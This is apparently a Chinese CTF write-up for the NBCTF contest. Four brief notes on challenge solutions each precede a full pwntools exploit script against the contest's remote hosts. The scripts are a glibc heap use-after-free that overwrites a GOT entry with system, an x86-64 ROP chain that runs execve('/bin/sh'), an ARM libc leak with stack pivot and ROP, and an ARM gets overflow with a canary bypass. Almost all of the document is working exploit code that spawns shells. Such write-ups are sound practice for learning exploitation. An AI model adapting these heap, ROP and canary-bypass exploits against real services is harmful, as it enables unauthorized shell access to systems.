day2打了一个叫NBCTF的比赛
做了四个题,剩下五道arm的题不会做了,关注一下wp,也许可以靠这个比赛提升一波异架构能力。
2.31简单堆题,没啥好说的,直接改got就行了
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch = 'amd64'

# Remote target.  The alternative launch lines (local process, qemu
# user-mode for other architectures, a "press Enter once gdb is attached"
# pause) are kept from the original setup and stay disabled.
#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io = remote('chal.nbctf.com', 30172)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf = ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#print("please start gdb")
#s=raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')


# Thin wrappers over the tube.  The script is written for Python 2
# pwntools (str and bytes are one type there), which is why the rest of
# the file mixes str literals with p64() output without encoding.
def rl(a=False):
    """recvline(); *a* is passed through as the keepends flag."""
    return io.recvline(a)


def ru(a, b=True):
    """recvuntil(*a*); *b* is passed through as the drop flag."""
    return io.recvuntil(a, b)


def rn(x):
    """Receive exactly *x* bytes."""
    return io.recvn(x)


def sn(x):
    """Send *x* without a trailing newline."""
    return io.send(x)


def sl(x):
    """Send *x* followed by a newline."""
    return io.sendline(x)


def sa(a, b):
    """Wait for *a*, then send *b*."""
    return io.sendafter(a, b)


def sla(a, b):
    """Wait for *a*, then send *b* plus a newline."""
    return io.sendlineafter(a, b)


def irt():
    """Hand the tube over to the terminal."""
    return io.interactive()


def dbg(text=None):
    """Attach gdb to the tube, optionally running *text* as gdb commands."""
    return gdb.attach(io, text)


def lg(s):
    """Log the current value of the expression string *s* in hex.

    *s* is evaluated with eval() in this module's scope, so only trusted
    literal names (``lg("heapbase")``) should ever be passed.
    """
    return log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))


def uu32(data):
    """Unpack *data* as a little-endian u32, NUL-padding short input."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Unpack *data* as a little-endian u64, NUL-padding short input."""
    return u64(data.ljust(8, b'\x00'))
def menu(choice):
    """Answer the "> " prompt with menu option *choice*."""
    option = str(choice)
    sla("> ", option)
def add(context):
    """Option 1: create a note whose data is *context*.

    The parameter name shadows pwntools' ``context`` object inside this
    function only; it is kept unchanged for call compatibility.
    """
    sla("> ", str(1))  # same as menu(1)
    sla("Input note data: ", context)
def show(index):
    """Option 2: print note *index*."""
    menu(2)
    which = str(index)
    sla("): ", which)
def edit(index, context):
    """Option 3: replace the data of note *index* with *context*.

    ``context`` shadows pwntools' global of the same name inside this
    function only; the parameter name is kept for compatibility.
    """
    sla("> ", str(3))  # same as menu(3)
    for prompt, value in (("): ", str(index)), ("Input note data: ", context)):
        sla(prompt, value)
def free(index):
    """Option 4: release note *index*."""
    menu(4)
    which = str(index)
    sla("): ", which)
# Interaction sequence for the first challenge (glibc 2.31 per the write-up).
# Python 2 script: the str fill passed to ljust() below would fail on Python 3.
bss=0x404120                        # assigned but not used below
add('/bin/sh\x00')                  # note 0
add('a'*8)                          # note 1
add('/bin/sh\x00')                  # note 2
free(0)
free(1)
show(1)                             # prints note 1's data after it was freed
# The printed bytes (minus the trailing newline) are read as a pointer;
# 0x2a0 is the author's offset from that pointer back to the heap start —
# confirm against the binary.  The rl()/uu64() helpers would do the same.
heapbase=u64(io.recvline()[:-1].ljust(8,'\x00'))-0x2a0
lg("heapbase")
edit(1,'a'*0x10)                    # rewrite the first 0x10 bytes of freed note 1
free(1)                             # note 1 is freed a second time
add(p64(0x404020))                  # 0x404020: presumably the GOT slot the write-up says gets overwritten — confirm
add('a'*8)
add(p64(elf.plt['system']))         # note data is the PLT address of system
show(2)                             # note 2 still holds '/bin/sh\x00'
#gdb.attach(io)
irt()
直接写rop硬拿shell就好,不用管它什么所谓的win函数,反正程序是静态编译的,什么gadget都有
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch = 'amd64'

# Remote instance of the second challenge.  Local / debug launch lines are
# kept from the original setup and stay commented out; no libc is loaded
# because, per the write-up, the binary is statically linked.
#io=process("./pwn")
#io=gdb.debug('./pwn','b*0x401922')
io = remote("chal.nbctf.com", 30170)
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
#io=remote('chal.nbctf.com',30172)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf = ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#print("please start gdb")
#s=raw_input()
#libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')


# Tube helpers (Python 2 pwntools: str and bytes are the same type, which
# is why the payload below concatenates str literals with p64() output).
def rl(a=False):
    """recvline(); *a* is passed through as the keepends flag."""
    return io.recvline(a)


def ru(a, b=True):
    """recvuntil(*a*); *b* is passed through as the drop flag."""
    return io.recvuntil(a, b)


def rn(x):
    """Receive exactly *x* bytes."""
    return io.recvn(x)


def sn(x):
    """Send *x* as-is."""
    return io.send(x)


def sl(x):
    """Send *x* plus a newline."""
    return io.sendline(x)


def sa(a, b):
    """Wait for *a*, then send *b*."""
    return io.sendafter(a, b)


def sla(a, b):
    """Wait for *a*, then send *b* plus a newline."""
    return io.sendlineafter(a, b)


def irt():
    """Switch to interactive mode."""
    return io.interactive()


def dbg(text=None):
    """Attach gdb, optionally running *text* as gdb commands."""
    return gdb.attach(io, text)


def lg(s):
    """Log the value of expression string *s* as hex.

    Uses eval() in module scope — pass only trusted literal names.
    """
    return log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))


def uu32(data):
    """Little-endian u32 of *data*, NUL-padded to 4 bytes."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Little-endian u64 of *data*, NUL-padded to 8 bytes."""
    return u64(data.ljust(8, b'\x00'))
# Fixed addresses in the statically linked binary (per the write-up);
# the *_ret names are the register-loading gadgets used in the chain.
rdi_ret=0x000000000040201f
rsi_ret=0x000000000040a04e
rdx_ret=0x000000000047fe1a
rax_ret=0x0000000000449267
win=0x401825                        # not used: the chain below does not go through it
puts=0x40c7b0                       # not used
t_read=0x448800                     # presumably a read wrapper — confirm in the binary
bss=0x4C6800
syscall=0x0000000000401dd4
# 0x28 bytes of padding, then: rdi=0, rsi=bss, rdx=8 -> t_read; afterwards
# rdi=bss, rsi=0, rdx=0, rax=59 -> syscall.  The 8 bytes sent after the
# prompt below are what that first call stores at bss.
payload='a'*0x28+p64(rdi_ret)+p64(0)+p64(rsi_ret)+p64(bss)+p64(rdx_ret)+p64(8)+p64(t_read)+p64(rdi_ret)+p64(bss)+p64(rsi_ret)+p64(0)+p64(rdx_ret)+p64(0)+p64(rax_ret)+p64(59)+p64(syscall)
# Earlier attempt via the win function, left disabled by the author.
#payload='You got this!'+'\x00'*8+'Just do it!'+'\x00'*8+p64(rdi_ret)+p64(0xF10C70B33F)+p64(rax_ret)+p64(rsi_ret)+p64(win)
sla("Can you give my pet frog some motivation to jump out the hole?",payload)
io.send('/bin/sh\x00')              # exactly 8 bytes, matching the rdx=8 size above
irt()
用自己的qemu-arm就可以直接怼shellcode,用它给的就不行,有点奇怪,而且没懂这个题和thumb有什么关系。直接泄露libc然后栈迁移到bss上直接rop就行,不过要事先找到能控制r0的gadget:直接用ROPgadget搜只能搜到控制fp、r3和r4的gadget,但是仔细找的话会发现,把0x10500地址处的mov r0,r3; pop {fp,pc}和pop {r3,pc}结合起来就可以直接控制r0,这也是为什么可以直接泄露libc再去进行rop的原因。
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
#context.log_level = 'debug'
context.arch = 'arm'

# Remote instance of the ARM challenge.  The local qemu-arm launch lines are
# kept from the original setup and stay disabled.
#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io = remote('chal.nbctf.com', 30175)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf = ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["./qemu-arm", "-g","4321","-L", ".", "./pwn"])
#io=process(["./qemu-arm", "-L", ".", "./pwn"])
#print("please start gdb")
# Pause until Enter is pressed (debugger-attach hook, left enabled by the
# author even though the target is remote).  raw_input() is Python 2.
s = raw_input()
libc = ELF('./libc.so.6')
#libc = ELF('./libc-2.31.so')


# Tube helpers.
def rl(a=False):
    """recvline(); *a* is passed through as the keepends flag."""
    return io.recvline(a)


def ru(a, b=True):
    """recvuntil(*a*); *b* is passed through as the drop flag."""
    return io.recvuntil(a, b)


def rn(x):
    """Receive exactly *x* bytes."""
    return io.recvn(x)


def sn(x):
    """Send *x* as-is."""
    return io.send(x)


def sl(x):
    """Send *x* plus a newline."""
    return io.sendline(x)


def sa(a, b):
    """Wait for *a*, then send *b*."""
    return io.sendafter(a, b)


def sla(a, b):
    """Wait for *a*, then send *b* plus a newline."""
    return io.sendlineafter(a, b)


def irt():
    """Switch to interactive mode."""
    return io.interactive()


def dbg(text=None):
    """Attach gdb, optionally running *text* as gdb commands."""
    return gdb.attach(io, text)


def lg(s):
    """Log the value of expression string *s* as hex.

    Uses eval() in module scope — pass only trusted literal names.
    """
    return log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))


def uu32(data):
    """Little-endian u32 of *data*, NUL-padded to 4 bytes (the natural
    width for this 32-bit target)."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Little-endian u64 of *data*, NUL-padded to 8 bytes."""
    return u64(data.ljust(8, b'\x00'))
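# Fixed addresses in the (non-PIE, 32-bit) ARM binary, so p32/u32 apply.
main=0x10510                        # not used below
bss=0x12600
gadget=0x104F0                      # presumably the pivot gadget the write-up describes — confirm
r3_pc=0x00010388                    # pop {r3, pc} (per the write-up)
r0_r3=0x10550                       # mov r0, r3 ; pop {fp, pc} (per the write-up)
# Stage 1: 0x20 bytes of padding, then the chain that prints the puts GOT entry.
payload='a'*0x20+p32(bss)+p32(r3_pc)+p32(elf.got['puts'])+p32(r0_r3)+p32(bss+0x24)+p32(gadget)+p32(0)+p32(bss)
sla("Can you ret2thumb? \n",payload)
leak = io.recvline()[:-1]
# 32-bit target: the leaked pointer is four bytes.  The original unpacked the
# whole line with u64(), which is only correct when puts() printed exactly
# four bytes; taking leak[:4] keeps the value right regardless of any bytes
# that follow the GOT entry in memory.  (Python 2: the fill is a str.)
libcbase = u32(leak[:4].ljust(4, '\x00')) - libc.sym['puts']
lg("libcbase")
#shellcode=asm(shellcraft.thumb.sh())
system=libcbase+libc.sym['system']
# Stage 2: 0x24 bytes of padding, r3 = bss+0x38 (where '/bin/sh\x00' lands),
# moved into r0, then system.
payload='a'*0x24+p32(r3_pc)+p32(bss+0x38)+p32(r0_r3)+p32(bss)+p32(system)+'/bin/sh\x00'
io.sendline(payload)
irt()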
程序给了gets,还给了在栈上写某条从已知地址出发的链上任意一个数据的功能;有canary,也给了后门。所以直接用大量后门地址覆盖栈,然后利用给的功能在bss找一个能指向canary的地址,把它写到对应位置上绕过canary保护就可以了。
from re import L
from pwn import *
from ctypes import *
from struct import pack
from io import BytesIO
import binascii
from PIL import Image
context.log_level = 'debug'        # left enabled: full tube traffic is logged
context.arch = 'arm'

# Remote instance of the fourth challenge.  Local qemu-arm launch lines are
# kept from the original setup and stay disabled.
#io=process("./pwn")
#io = remote("tamuctf.com", 443, ssl=True, sni="encryptinator")
io = remote('chal.nbctf.com', 30178)
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
elf = ELF('./pwn')
#io = remote('arm.nc.jctf.pro', 17916)
#io=process(["qemu-ppc", "-g", "4321", "./pwn"])
#io=process(["./qemu-arm", "-g","4321","-L", ".", "./pwn"])
#io=process(["./qemu-arm", "-L", ".", "./pwn"])
#print("please start gdb")
# Pause until Enter is pressed (debugger-attach hook, left enabled by the
# author).  raw_input() is Python 2.
s = raw_input()
libc = ELF('./libc.so.6')         # loaded but not used by this script
#libc = ELF('./libc-2.31.so')


# Tube helpers.
def rl(a=False):
    """recvline(); *a* is passed through as the keepends flag."""
    return io.recvline(a)


def ru(a, b=True):
    """recvuntil(*a*); *b* is passed through as the drop flag."""
    return io.recvuntil(a, b)


def rn(x):
    """Receive exactly *x* bytes."""
    return io.recvn(x)


def sn(x):
    """Send *x* as-is."""
    return io.send(x)


def sl(x):
    """Send *x* plus a newline."""
    return io.sendline(x)


def sa(a, b):
    """Wait for *a*, then send *b*."""
    return io.sendafter(a, b)


def sla(a, b):
    """Wait for *a*, then send *b* plus a newline."""
    return io.sendlineafter(a, b)


def irt():
    """Switch to interactive mode."""
    return io.interactive()


def dbg(text=None):
    """Attach gdb, optionally running *text* as gdb commands."""
    return gdb.attach(io, text)


def lg(s):
    """Log the value of expression string *s* as hex.

    Uses eval() in module scope — pass only trusted literal names.
    """
    return log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))


def uu32(data):
    """Little-endian u32 of *data*, NUL-padded to 4 bytes."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Little-endian u64 of *data*, NUL-padded to 8 bytes."""
    return u64(data.ljust(8, b'\x00'))


# Address of the backdoor function the write-up mentions ("给了后门").
win = 0x10828
def menu(choice):
    """Pick menu entry *choice* at the "> " prompt."""
    selection = str(choice)
    sla("> ", selection)
def mine(index, depth):
    """Option 1: send the mining position *index*, then the mining depth *depth*."""
    menu(1)
    answers = (
        ("mining position\n> ", index),
        ("mining depth\n> ", depth),
    )
    for prompt, value in answers:
        sla(prompt, str(value))
def extract(index):
    """Option 2: select minecart *index*."""
    sla("> ", str(2))  # same as menu(2)
    sla("minecart number\n> ", str(index))
def gets(payload):
    """Option 3: send *payload* as the "collapsing mineshaft" input.

    Per the write-up this input is read with gets(), i.e. without a length
    limit, so *payload* may be longer than the destination buffer.
    """
    menu(3)
    sla("collapsing mineshaft\n> ", payload)
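# 0x20 copies of win+1; the set low bit presumably selects Thumb state for
# the branch target — confirm against the binary.
payload=p32(win+1)*0x20
gets(payload)                        # option 3: the unbounded read that overruns the stack
# Start address handed to mine(); the write-up says it is a bss address from
# which the program's pointer chain reaches the canary.
guard=0x21038
mine(guard,2)                        # the original repeated the literal 0x21038 here
extract(8)
menu(4)                              # option 4: presumably the exit path whose return uses the overwritten frame — confirm
irt()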